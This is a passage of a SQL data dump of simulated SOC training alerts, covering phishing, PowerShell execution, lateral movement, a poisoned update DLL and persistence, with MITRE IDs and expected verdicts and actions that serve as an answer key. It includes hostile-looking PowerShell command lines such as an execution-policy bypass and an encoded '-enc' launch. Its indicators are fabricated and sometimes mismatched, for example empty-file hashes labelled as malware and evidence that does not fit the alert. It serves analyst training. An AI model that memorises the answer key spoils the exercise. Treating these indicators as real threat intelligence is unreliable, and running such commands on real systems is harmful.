AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(274, 'Phishing Attempt via Weaponized Job Offers', 'medium', 'Email Gateway', 'The Lazarus Group has sent a phishing email to a developer at the company, masquerading as a recruiter with a lucrative job offer. The email contains a malicious attachment designed to harvest credentials.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'Closed', 34, '{\"timestamp\":\"2023-09-25T13:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"email_from\":\"recruiter@example.com\",\"email_to\":\"dev.user@company.com\",\"subject\":\"Exciting Job Opportunity!\",\"attachment_name\":\"JobOffer.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"Email Received\"}', '2025-12-31 13:43:07', '2026-02-18 07:29:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"recruiter@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email domain has been reported in phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"JobOffer.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macros used for credential harvesting\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malicious document containing macros\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt via Weaponized Job Offers\",\"date\":\"2026-02-01T20:32:18.878Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(275, 'Malicious Code Execution on Developer Systems', 'high', 'EDR', 'Malicious code executed on developer systems following a successful phishing attack, providing attackers access to the DeFi platform\'s development environment.', 'Malware', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-11T14:22:35Z\",\"event_id\":\"4567\",\"event_type\":\"process_creation\",\"user\":\"dev_user01\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"additional_info\":{\"file_path\":\"C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\"}}', '2025-12-31 13:43:07', '2026-02-18 07:29:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"dev_user01\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account on the development system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the developer\'s machine.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used to execute malicious commands.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(276, 'Establishing Persistence and Lateral Movement', 'high', 'Network Traffic Analysis', 'Attackers are using compromised credentials to move laterally within the DeFi platform\'s network, aiming to escalate privileges and maintain access across critical systems.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"method\":\"SMB\",\"file_transferred\":\"persistence_tool.exe\",\"hash\":\"3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\",\"action\":\"Successful Authentication\",\"protocol\":\"SMB\",\"severity\":\"High\"}', '2025-12-31 13:43:07', '2026-02-18 07:30:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with lateral movement activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Critical system targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP known for malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal user database\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"persistence_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware analysis\",\"verdict\":\"malicious\",\"details\":\"File used for establishing persistence within the network.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash lookup\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(277, 'Cryptocurrency Exfiltration and Laundering', 'critical', 'Blockchain Analysis', 'The operation culminates in the transfer of $600 million worth of cryptocurrency from the DeFi platform’s wallets. The attackers employ mixer services to launder the funds, making tracking and recovery efforts challenging.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"event_id\":\"evt-2023-cryptoxfil-004\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.5\",\"transaction_id\":\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\",\"transfer_amount\":\"600000000\",\"currency\":\"USD\",\"destination_address\":\"1MixerServiceX1yZ3w4V5\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"attacker@malicious.com\",\"filename\":\"exfil_transaction_details.csv\"}', '2025-12-31 13:43:07', '2026-02-18 07:31:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known cybercrime activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Blockchain Explorer\",\"verdict\":\"malicious\",\"details\":\"Hash used in fraudulent transaction.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email linked to multiple phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exfil_transaction_details.csv\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Filename indicates potential data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.881Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:30Z\\\",\\\"event_id\\\":\\\"evt-2023-cryptoxfil-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.5\\\",\\\"transaction_id\\\":\\\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\\\",\\\"transfer_amount\\\":\\\"600000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"destination_address\\\":\\\"1MixerServiceX1yZ3w4V5\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"user\\\":\\\"attacker@malicious.com\\\",\\\"filename\\\":\\\"exfil_transaction_details.csv\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(278, 'Compromised Update Detected', 'high', 'Software Update Logs', 'A malicious DLL was detected within a signed update package of the server management software. The package was distributed to users, potentially granting attackers initial access.', 'Malware', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-14T12:34:56Z\",\"event_id\":\"update_12345\",\"update_source\":\"server_mgmt_software\",\"update_version\":\"v3.2.1\",\"affected_component\":\"lib_mgmt.dll\",\"malicious_hash\":\"e5d8870e5bdd26602c622b7e5b0f6b4c\",\"signed_cert\":\"CN=ServerMgmt, O=TrustedSoftware Inc.\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"admin_user\",\"filename\":\"lib_mgmt.dll\"}', '2025-12-31 13:45:44', '2026-02-18 07:33:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e5d8870e5bdd26602c622b7e5b0f6b4c\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a malware distribution campaign.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lib_mgmt.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Software Repository\",\"verdict\":\"internal\",\"details\":\"Filename matches legitimate component, but altered.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Authorized user for software management.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.882Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T12:34:56Z\\\",\\\"event_id\\\":\\\"update_12345\\\",\\\"update_source\\\":\\\"server_mgmt_software\\\",\\\"update_version\\\":\\\"v3.2.1\\\",\\\"affected_component\\\":\\\"lib_mgmt.dll\\\",\\\"malicious_hash\\\":\\\"e5d8870e5bdd26602c622b7e5b0f6b4c\\\",\\\"signed_cert\\\":\\\"CN=ServerMgmt, O=TrustedSoftware Inc.\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"admin_user\\\",\\\"filename\\\":\\\"lib_mgmt.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(279, 'Execution of Malicious Code', 'high', 'Endpoint Detection and Response (EDR)', 'Once the update is installed, the malicious DLL executes its payload, allowing the attacker to establish an initial presence within the network.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-05T14:23:47Z\",\"event_id\":\"EDR-EXEC-20231005-143\",\"hostname\":\"compromised-host-01\",\"user\":\"jdoe\",\"process_name\":\"rundll32.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\malicious.dll\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"action\":\"Execute\",\"outcome\":\"Success\",\"additional_info\":\"The DLL was executed remotely via rundll32.exe, establishing a reverse shell.\"}', '2025-12-31 13:45:44', '2026-02-18 07:34:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple engines as a trojan.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Local Database\",\"verdict\":\"malicious\",\"details\":\"File associated with recent compromise attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User is a legitimate employee.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(280, 'Establish Persistence', 'high', 'Intrusion Detection System (IDS)', 'An advanced persistent threat actor has set up a backdoor to maintain access to compromised systems by creating a persistent service. This allows for continued unauthorized access even if initial malware is removed.', 'Persistence', 'T1547.001', 1, 'Closed', 169, '{\"timestamp\":\"2023-09-14T02:45:12Z\",\"event_id\":\"12345678\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"admin_user\",\"action\":\"establish_persistence\",\"persistence_type\":\"service_creation\",\"service_name\":\"UpdateService\",\"service_exe\":\"C:\\\\Windows\\\\System32\\\\updater.exe\",\"file_hash\":\"abc123def4567890abc123def4567890\",\"status\":\"success\"}', '2025-12-31 13:45:44', '2026-02-18 07:34:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with multiple APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by the attacker.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"abc123def4567890abc123def4567890\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware samples.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account used for unauthorized service creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 